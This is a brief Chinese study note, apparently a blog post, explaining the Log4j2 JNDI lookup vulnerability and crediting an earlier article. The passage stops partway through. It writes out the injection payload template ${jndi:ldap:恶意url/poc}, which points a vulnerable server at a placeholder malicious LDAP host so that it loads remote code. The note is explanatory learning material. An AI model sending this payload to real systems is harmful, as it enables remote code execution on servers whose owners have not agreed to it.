根据这个大佬的文章进行学习的 https://blog.csdn.net/Bossfrank/article/details/130148819 一：漏洞概述 Log4j漏洞是由于Log4j2在处理日志消息中的JNDI（JavaNamingandDirectoryInterface）查找时存在的不安全实现而引发的。攻击者可以通过特制的日志消息利用此漏洞，从而使Log4j在处理日志消息时，连接到恶意的LDAP服务器并执行任意代码。 二：漏洞原理 攻击者构造payload，在JNDI接口lookup查询进行注入，payload为${jndi:ldap:恶意url/poc}，JNDI会去对应的服务...